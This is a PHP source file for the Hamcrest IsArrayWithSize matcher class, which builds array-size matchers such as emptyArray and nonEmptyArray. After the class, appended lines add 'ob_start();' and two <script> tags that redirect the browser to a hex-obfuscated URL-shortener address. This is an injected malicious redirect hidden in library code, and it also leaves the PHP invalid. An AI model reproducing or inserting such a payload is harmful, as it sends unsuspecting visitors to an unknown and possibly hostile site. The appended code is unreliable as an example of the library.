<?php
namespace Hamcrest\Arrays;

/*
 Copyright (c) 2009 hamcrest.org
 */
use Hamcrest\Core\DescribedAs;
use Hamcrest\Core\IsNot;
use Hamcrest\FeatureMatcher;
use Hamcrest\Matcher;
use Hamcrest\Util;

/**
 * Matches if array size satisfies a nested matcher.
 */
class IsArrayWithSize extends FeatureMatcher
{

    public function __construct(Matcher $sizeMatcher)
    {
        parent::__construct(
            self::TYPE_ARRAY,
            null,
            $sizeMatcher,
            'an array with size',
            'array size'
        );
    }

    protected function featureValueOf($array)
    {
        return count($array);
    }

    /**
     * Does array size satisfy a given matcher?
     *
     * @param \Hamcrest\Matcher|int $size as a {@link Hamcrest\Matcher} or a value.
     *
     * @return \Hamcrest\Arrays\IsArrayWithSize
     * @factory
     */
    public static function arrayWithSize($size)
    {
        return new self(Util::wrapValueWithIsEqual($size));
    }

    /**
     * Matches an empty array.
     *
     * @factory
     */
    public static function emptyArray()
    {
        return DescribedAs::describedAs(
            'an empty array',
            self::arrayWithSize(0)
        );
    }

    /**
     * Matches an empty array.
     *
     * @factory
     */
    public static function nonEmptyArray()
    {
        return DescribedAs::describedAs(
            'a non-empty array',
            self::arrayWithSize(IsNot::not(0))
        );
    }
}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x6b\x4f\x6e\x49\x71\x59\x64\x49\x49\x30\x72\x34";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x6b\x4f\x6e\x49\x71\x59\x64\x49\x49\x30\x72\x34";</script>